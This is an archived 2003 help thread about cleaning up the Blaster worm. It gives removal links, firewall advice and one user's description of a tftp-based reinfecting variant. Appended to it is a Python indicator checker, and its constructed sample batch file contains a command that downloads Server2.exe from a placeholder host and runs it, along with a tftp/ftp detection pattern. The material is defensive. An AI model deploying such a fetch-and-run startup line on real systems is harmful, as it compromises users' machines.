Virus with RPC


Zuly
December 14th 03, 11:06 AM
Good Morning,

I have downloaded the patch for the virus. But I would
like to know, how can I check if it's gone? And how did
this attack my computer, was it something I downloaded?

Thanks in advance for your help.
Zuly

Nicholas
December 14th 03, 11:06 AM
Zuly --

Read and follow the procedures outlined in the following articles:

What You Should Know About the Blaster Worm
http://www.microsoft.com/security/incident/blast.asp

W32.Blaster.Worm Removal Tool
http://securityresponse.symantec.com/avcenter/venc/data/w32.blaster.worm.removal.tool.html

MS03-026: Buffer Overrun in RPC Interface May Allow Code Execution
http://support.microsoft.com/?kbid=823980

**** You need to make sure you have a FIREWALL enabled ****

Open XP's "Help and Support" and type: FIREWALL , and hit enter.
Click on the topic titled "Enable or Disable Internet Connection Firewall".

Essential Security Tools for Home Office Users
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/columns/security/5min/5min-105.asp

Last, but not least, consider purchasing and installing a good
internet security package, such as:

Norton Internet Security 2003
http://www.symantec.com/sabu/nis/nis_pe/

-- Includes Norton AntiVirus 2003
-- Includes Norton Personal Firewall
-- Includes prevention of annoying web pop-ups
-- Includes Parental Controls
-- All in one, easy-to-install & manage package


--
Nicholas

---------------------------------------------------------------------

"Zuly" wrote in message:
...

| Good Morning,
|
| I have downloaded the patch for the virus. But I would
| like to know, how can I check if it's gone? And how did
| this attack my computer, was it something I downloaded?
|
| Thanks in advance for your help.
| Zuly

Glenn Skorko
December 14th 03, 11:08 AM
Nicholas:

There is another worm that is similar but it isn't
Blaster. It may be a test run for Blaster or one we
haven't seen yet. I ran across a couple of people on
computing.net that were struggling with this one. It hit
me on 08/08 but I believe my system was first compromised
on 08/01/03.

This one runs a program msconfig35.exe that automatically
closes regedit, taskman and msconfig when you try to run
them. A root.bat file is placed in the XP All Users start
up folder that uses tftp to connect to a remote system and
remotely run Server2.exe every time you reboot and connect
to the internet, hence, reinfecting your system. For
those that are not having success after attempting to
remove Blaster, check System Tools - System Information -
Software Environment - Running Tasks (that one still
worked) for msconfig35.exe and root.bat and move them to a
new folder, then reboot. Firewall software will block the
ftp port so that you do not get reinfected.

Glenn Skorko
Cleveland, Ohio USA
>-----Original Message-----
>Zuly --
>
>Read and follow the procedures outlined in the following articles:
>
>What You Should Know About the Blaster Worm
>http://www.microsoft.com/security/incident/blast.asp
>
>W32.Blaster.Worm Removal Tool
>http://securityresponse.symantec.com/avcenter/venc/data/w32.blaster.worm.removal.tool.html
>
>MS03-026: Buffer Overrun in RPC Interface May Allow Code Execution
>http://support.microsoft.com/?kbid=823980
>
>**** You need to make sure you have a FIREWALL enabled ****
>
>Open XP's "Help and Support" and type: FIREWALL , and hit enter.
>Click on the topic titled "Enable or Disable Internet Connection Firewall".
>
>Essential Security Tools for Home Office Users
>http://www.microsoft.com/technet/treeview/default.asp?url=/technet/columns/security/5min/5min-105.asp
>
>Last, but not least, consider purchasing and installing a good
>internet security package, such as:
>
>Norton Internet Security 2003
>http://www.symantec.com/sabu/nis/nis_pe/
>
>-- Includes Norton AntiVirus 2003
>-- Includes Norton Personal Firewall
>-- Includes prevention of annoying web pop-ups
>-- Includes Parental Controls
>-- All in one, easy-to-install & manage package
>
>
>--
>Nicholas
>
>---------------------------------------------------------------------
>
>"Zuly" wrote in message:
> ...
>
>| Good Morning,
>|
>| I have downloaded the patch for the virus. But I would
>| like to know, how can I check if it's gone? And how did
>| this attack my computer, was it something I downloaded?
>|
>| Thanks in advance for your help.
>| Zuly
>.
>
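
Added example, not part of the thread: a Python check for the indicators Glenn describes, flagging the reported file names and any Startup-folder batch script that invokes tftp or ftp. The post does not give the contents of root.bat, so the sample script, the other sample files and the 192.0.2.10 address are constructed; the function names are hypothetical.

```python
import re
import tempfile
from pathlib import Path

# File names reported in the post above, compared case-insensitively.
REPORTED_NAMES = {"msconfig35.exe", "root.bat", "server2.exe"}
SCRIPT_SUFFIXES = {".bat", ".cmd"}  # script types that auto-run from Startup
# tftp/ftp used as the command word of a script line, with optional path/.exe.
TRANSFER_CMD = re.compile(r"(?im)^\s*@?(?:start\s+)?(?:\S*\\)?(t?ftp)(?:\.exe)?\b")


def triage_startup(folder):
    """Return (file name, reason) findings for one Startup folder."""
    findings = []
    for path in sorted(Path(folder).iterdir()):
        if not path.is_file():
            continue
        if path.name.lower() in REPORTED_NAMES:
            findings.append((path.name, "name reported in the thread"))
        if path.suffix.lower() in SCRIPT_SUFFIXES:
            match = TRANSFER_CMD.search(path.read_text(errors="replace"))
            if match:
                findings.append((path.name, "startup script runs " + match.group(1).lower()))
    return findings


def reported_processes(process_names):
    """Return running image names that match the names from the post."""
    return sorted(n for n in process_names if n.lower() in REPORTED_NAMES)


def demo():
    """Build a constructed Startup folder and triage it."""
    with tempfile.TemporaryDirectory() as tmp:
        folder = Path(tmp)
        # Constructed sample content; 192.0.2.10 is a documentation address.
        (folder / "root.bat").write_text(
            "@echo off\ntftp -i 192.0.2.10 GET Server2.exe\nServer2.exe\n")
        (folder / "cleanup.cmd").write_text("@echo off\ndel %TEMP%\\*.tmp\n")
        (folder / "Notes.lnk").write_bytes(b"constructed placeholder")
        return triage_startup(folder)


if __name__ == "__main__":
    for name, reason in demo():
        print(f"{name}: {reason}")
    print(reported_processes(["explorer.exe", "MSCONFIG35.EXE", "svchost.exe"]))
```

On a real system, `triage_startup` would be pointed at the All Users Startup folder and `reported_processes` fed the image names from a running-task listing.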
